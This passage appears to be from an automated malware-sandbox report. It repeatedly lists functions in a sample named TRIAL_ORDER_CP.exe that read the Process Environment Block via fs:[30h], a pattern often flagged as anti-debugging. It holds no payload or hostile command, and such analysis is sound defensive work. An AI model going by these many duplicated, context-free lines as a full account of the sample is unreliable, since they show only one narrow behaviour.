        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E79D mov eax, dword ptr fs:[00000030h]3_2_33B8E79D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEB781 mov eax, dword ptr fs:[00000030h]3_2_33BEB781
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEB781 mov eax, dword ptr fs:[00000030h]3_2_33BEB781
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B177F9 mov eax, dword ptr fs:[00000030h]3_2_33B177F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B177F9 mov eax, dword ptr fs:[00000030h]3_2_33B177F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3E7E0 mov eax, dword ptr fs:[00000030h]3_2_33B3E7E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF7CF mov eax, dword ptr fs:[00000030h]3_2_33BCF7CF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B39723 mov eax, dword ptr fs:[00000030h]3_2_33B39723
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1471B mov eax, dword ptr fs:[00000030h]3_2_33B1471B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1471B mov eax, dword ptr fs:[00000030h]3_2_33B1471B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF717 mov eax, dword ptr fs:[00000030h]3_2_33BCF717
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1D700 mov ecx, dword ptr fs:[00000030h]3_2_33B1D700
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B705 mov eax, dword ptr fs:[00000030h]3_2_33B0B705
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B705 mov eax, dword ptr fs:[00000030h]3_2_33B0B705
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B705 mov eax, dword ptr fs:[00000030h]3_2_33B0B705
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B705 mov eax, dword ptr fs:[00000030h]3_2_33B0B705
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD970B mov eax, dword ptr fs:[00000030h]3_2_33BD970B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD970B mov eax, dword ptr fs:[00000030h]3_2_33BD970B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3270D mov eax, dword ptr fs:[00000030h]3_2_33B3270D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3270D mov eax, dword ptr fs:[00000030h]3_2_33B3270D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3270D mov eax, dword ptr fs:[00000030h]3_2_33B3270D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B40774 mov eax, dword ptr fs:[00000030h]3_2_33B40774
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B14779 mov eax, dword ptr fs:[00000030h]3_2_33B14779
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B14779 mov eax, dword ptr fs:[00000030h]3_2_33B14779
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B22760 mov ecx, dword ptr fs:[00000030h]3_2_33B22760
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A750 mov eax, dword ptr fs:[00000030h]3_2_33B4A750
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov ecx, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBE750 mov eax, dword ptr fs:[00000030h]3_2_33BBE750
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B43740 mov eax, dword ptr fs:[00000030h]3_2_33B43740
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4174A mov eax, dword ptr fs:[00000030h]3_2_33B4174A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD86A8 mov eax, dword ptr fs:[00000030h]3_2_33BD86A8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD86A8 mov eax, dword ptr fs:[00000030h]3_2_33BD86A8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B18690 mov eax, dword ptr fs:[00000030h]3_2_33B18690
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8D69D mov eax, dword ptr fs:[00000030h]3_2_33B8D69D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9C691 mov eax, dword ptr fs:[00000030h]3_2_33B9C691
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF68C mov eax, dword ptr fs:[00000030h]3_2_33BCF68C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8C6F2 mov eax, dword ptr fs:[00000030h]3_2_33B8C6F2
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8C6F2 mov eax, dword ptr fs:[00000030h]3_2_33B8C6F2
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B096E0 mov eax, dword ptr fs:[00000030h]3_2_33B096E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B096E0 mov eax, dword ptr fs:[00000030h]3_2_33B096E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1C6E0 mov eax, dword ptr fs:[00000030h]3_2_33B1C6E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B156E0 mov eax, dword ptr fs:[00000030h]3_2_33B156E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B156E0 mov eax, dword ptr fs:[00000030h]3_2_33B156E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B156E0 mov eax, dword ptr fs:[00000030h]3_2_33B156E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B366E0 mov eax, dword ptr fs:[00000030h]3_2_33B366E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B366E0 mov eax, dword ptr fs:[00000030h]3_2_33B366E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3D6D0 mov eax, dword ptr fs:[00000030h]3_2_33B3D6D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDA6C0 mov eax, dword ptr fs:[00000030h]3_2_33BDA6C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B106CF mov eax, dword ptr fs:[00000030h]3_2_33B106CF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B10630 mov eax, dword ptr fs:[00000030h]3_2_33B10630
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B40630 mov eax, dword ptr fs:[00000030h]3_2_33B40630
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B98633 mov esi, dword ptr fs:[00000030h]3_2_33B98633
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B98633 mov eax, dword ptr fs:[00000030h]3_2_33B98633
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B98633 mov eax, dword ptr fs:[00000030h]3_2_33B98633
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4F63F mov eax, dword ptr fs:[00000030h]3_2_33B4F63F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4F63F mov eax, dword ptr fs:[00000030h]3_2_33B4F63F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B17623 mov eax, dword ptr fs:[00000030h]3_2_33B17623
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B15622 mov eax, dword ptr fs:[00000030h]3_2_33B15622
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B15622 mov eax, dword ptr fs:[00000030h]3_2_33B15622
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4C620 mov eax, dword ptr fs:[00000030h]3_2_33B4C620
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBD62C mov ecx, dword ptr fs:[00000030h]3_2_33BBD62C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBD62C mov ecx, dword ptr fs:[00000030h]3_2_33BBD62C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBD62C mov eax, dword ptr fs:[00000030h]3_2_33BBD62C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3D600 mov eax, dword ptr fs:[00000030h]3_2_33B3D600
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3D600 mov eax, dword ptr fs:[00000030h]3_2_33B3D600
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF607 mov eax, dword ptr fs:[00000030h]3_2_33BCF607
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4360F mov eax, dword ptr fs:[00000030h]3_2_33B4360F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B10670 mov eax, dword ptr fs:[00000030h]3_2_33B10670
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52670 mov eax, dword ptr fs:[00000030h]3_2_33B52670
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52670 mov eax, dword ptr fs:[00000030h]3_2_33B52670
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B23660 mov eax, dword ptr fs:[00000030h]3_2_33B23660
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B23660 mov eax, dword ptr fs:[00000030h]3_2_33B23660
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B23660 mov eax, dword ptr fs:[00000030h]3_2_33B23660
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B07662 mov eax, dword ptr fs:[00000030h]3_2_33B07662
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B07662 mov eax, dword ptr fs:[00000030h]3_2_33B07662
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B07662 mov eax, dword ptr fs:[00000030h]3_2_33B07662
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4666D mov esi, dword ptr fs:[00000030h]3_2_33B4666D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4666D mov eax, dword ptr fs:[00000030h]3_2_33B4666D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4666D mov eax, dword ptr fs:[00000030h]3_2_33B4666D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B45654 mov eax, dword ptr fs:[00000030h]3_2_33B45654
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4265C mov eax, dword ptr fs:[00000030h]3_2_33B4265C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4265C mov ecx, dword ptr fs:[00000030h]3_2_33B4265C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4265C mov eax, dword ptr fs:[00000030h]3_2_33B4265C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1965A mov eax, dword ptr fs:[00000030h]3_2_33B1965A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1965A mov eax, dword ptr fs:[00000030h]3_2_33B1965A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F640 mov eax, dword ptr fs:[00000030h]3_2_33B2F640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F640 mov eax, dword ptr fs:[00000030h]3_2_33B2F640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F640 mov eax, dword ptr fs:[00000030h]3_2_33B2F640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4C640 mov eax, dword ptr fs:[00000030h]3_2_33B4C640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4C640 mov eax, dword ptr fs:[00000030h]3_2_33B4C640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D64A mov eax, dword ptr fs:[00000030h]3_2_33B0D64A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D64A mov eax, dword ptr fs:[00000030h]3_2_33B0D64A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B145B0 mov eax, dword ptr fs:[00000030h]3_2_33B145B0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B145B0 mov eax, dword ptr fs:[00000030h]3_2_33B145B0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B985AA mov eax, dword ptr fs:[00000030h]3_2_33B985AA
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B42594 mov eax, dword ptr fs:[00000030h]3_2_33B42594
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9C592 mov eax, dword ptr fs:[00000030h]3_2_33B9C592
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E588 mov eax, dword ptr fs:[00000030h]3_2_33B8E588
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E588 mov eax, dword ptr fs:[00000030h]3_2_33B8E588
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A580 mov eax, dword ptr fs:[00000030h]3_2_33B4A580
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A580 mov eax, dword ptr fs:[00000030h]3_2_33B4A580
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B49580 mov eax, dword ptr fs:[00000030h]3_2_33B49580
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B49580 mov eax, dword ptr fs:[00000030h]3_2_33B49580
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF582 mov eax, dword ptr fs:[00000030h]3_2_33BCF582
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9C5FC mov eax, dword ptr fs:[00000030h]3_2_33B9C5FC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]3_2_33B1B5E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]3_2_33B1B5E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]3_2_33B1B5E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]3_2_33B1B5E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]3_2_33B1B5E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]3_2_33B1B5E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A5E7 mov ebx, dword ptr fs:[00000030h]3_2_33B4A5E7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A5E7 mov eax, dword ptr fs:[00000030h]3_2_33B4A5E7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B415EF mov eax, dword ptr fs:[00000030h]3_2_33B415EF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B465D0 mov eax, dword ptr fs:[00000030h]3_2_33B465D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4C5C6 mov eax, dword ptr fs:[00000030h]3_2_33B4C5C6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]3_2_33B0F5C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B905C6 mov eax, dword ptr fs:[00000030h]3_2_33B905C6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B13536 mov eax, dword ptr fs:[00000030h]3_2_33B13536
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B13536 mov eax, dword ptr fs:[00000030h]3_2_33B13536
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52539 mov eax, dword ptr fs:[00000030h]3_2_33B52539
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0753F mov eax, dword ptr fs:[00000030h]3_2_33B0753F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0753F mov eax, dword ptr fs:[00000030h]3_2_33B0753F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0753F mov eax, dword ptr fs:[00000030h]3_2_33B0753F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B41527 mov eax, dword ptr fs:[00000030h]3_2_33B41527
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4F523 mov eax, dword ptr fs:[00000030h]3_2_33B4F523
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]3_2_33B2252B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]3_2_33B2252B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]3_2_33B2252B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]3_2_33B2252B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]3_2_33B2252B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]3_2_33B2252B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]3_2_33B2252B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
